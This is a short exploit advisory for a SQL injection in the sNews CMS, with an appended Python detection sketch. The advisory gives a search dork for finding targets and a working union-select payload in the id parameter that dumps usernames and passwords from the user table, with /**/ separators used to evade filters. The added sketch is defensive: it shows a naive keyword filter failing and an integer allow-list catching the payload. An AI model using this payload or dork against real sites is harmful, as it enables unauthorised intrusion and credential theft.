Title: CMS snews SQL Injection Vulnerability
Author: onestree
Download: http://snewscms.com/
Tested on: ubuntu 12.10 / win 7
Keyword: inurl:"tanyakan pada rumput yang bergoyang"

*************************************************************

SQL poc:

http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]

Example:

http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*

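Detection sketch for the request shape shown above, added here as an example and not part of the original advisory or of the sNews code. It assumes a legitimate shownews id is a short unsigned integer; the sample request lines, regexes and function names are constructed for illustration. It shows why a keyword filter that expects whitespace misses the /**/ separators used in the PoC, while an allow-list on the id value catches them.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample request lines (not taken from the original page).
SAMPLE_REQUESTS = [
    "GET /snews/snews.php?act=shownews&id=23 HTTP/1.1",
    "GET /snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1 HTTP/1.1",
    "GET /snews/snews.php?act=shownews&id=23%20like%201 HTTP/1.1",
    "GET /snews/snews.php?act=list HTTP/1.1",
]

# Keyword filter that expects whitespace between SQL keywords.
NAIVE_FILTER = re.compile(r"union\s+select", re.IGNORECASE)
# Assumption: a legitimate shownews id is a short unsigned integer.
STRICT_ID = re.compile(r"[0-9]{1,10}")


def id_values(request_line):
    """Return the URL-decoded id values of a shownews request, else []."""
    parts = request_line.split(" ")
    if len(parts) < 2:
        return []
    query = parse_qs(urlsplit(parts[1]).query, keep_blank_values=True)
    if query.get("act") != ["shownews"]:
        return []
    return query.get("id", [])


def naive_flag(request_line):
    """True if the whitespace-based keyword filter matches an id value."""
    return any(NAIVE_FILTER.search(v) for v in id_values(request_line))


def strict_flag(request_line):
    """True if any id value is not a plain unsigned integer."""
    return any(not STRICT_ID.fullmatch(v) for v in id_values(request_line))


def scan(request_lines):
    """Return the request lines whose id fails the allow-list check."""
    return [line for line in request_lines if strict_flag(line)]


if __name__ == "__main__":
    for line in scan(SAMPLE_REQUESTS):
        print("suspicious:", line)
```

The same allow-list belongs in the application itself: cast id to an integer or bind it through a prepared statement before it reaches the query.
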
Thanks:
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell

indonesiancoder - moeslimh4x0r - go-coder
special my hunny :*